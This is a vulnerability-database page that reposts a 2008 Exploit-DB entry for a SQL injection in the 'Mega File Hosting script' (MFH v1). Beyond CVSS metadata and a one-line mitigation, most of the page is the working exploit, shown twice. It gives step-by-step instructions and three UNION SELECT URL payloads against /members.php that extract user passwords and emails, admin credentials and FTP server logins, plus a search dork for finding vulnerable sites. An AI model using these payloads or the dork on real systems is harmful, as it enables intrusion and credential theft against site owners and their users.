header-logo
Suggest Exploit
vendor:
MFH v1
by:
milw0rm.com
7.5
CVSS
HIGH
SQL Injection
89
CWE
Product Name: MFH v1
Affected Version From: N/A
Affected Version To: N/A
Patch Exists: YES
Related CWE: N/A
CPE: N/A
Metasploit: N/A
Other Scripts: N/A
Tags: N/A
CVSS Metrics: N/A
Nuclei References: N/A
Nuclei Metadata: N/A
Platforms Tested: N/A
2008

Mega File Hosting script

Register an account, login and go to /members.php?folders=1 and create a folder with any name. Exploitation options include: ADIM 1: /members.php?folders=1&fid=-1+union+all+select+1,2,concat(user,0x3a,email),pass,5,6,7,8+from+users+-- to get the users; ADIM 2: Go to /members.php?folders=1&fid=-1+union+all+select+1,2,admin,pass,5,6,7,8+from+setting+-- to get the admin info; ADIM 3: Go to /members.php?folders=1&fid=-1+union+all+select+1,2,user,pass,5,6,7,8+from+server+-- to get the ftp server info (if its configured).

Mitigation:

Ensure that user input is validated and filtered before being used in SQL queries.
Source

Exploit-DB raw data:

########################################

Script: Mega File Hosting script

########################################

Type: SQL Injection

########################################

1923TURK.ORG
TURKiSHWARRiORR

Step 1: Register an account

Step 2: login and go to /members.php?folders=1

Step 3: Create a folder with any name

Exploitation options:

ADIM 1: /members.php?folders=1&fid=-1+union+all+select+1,2,concat(user,0x3a,email),pass,5,6,7,8+from+users+-- to get the users

ADIM 2: Go to /members.php?folders=1&fid=-1+union+all+select+1,2,admin,pass,5,6,7,8+from+setting+-- to get the admin info

ADIM 3: Go to /members.php?folders=1&fid=-1+union+all+select+1,2,user,pass,5,6,7,8+from+server+-- to get the ftp server info (if its configured)



#######################################

dork: "Powered by: MFH v1"

####################################### 

# milw0rm.com [2008-05-12]

Navigation

Suggest Exploit

Services By CQR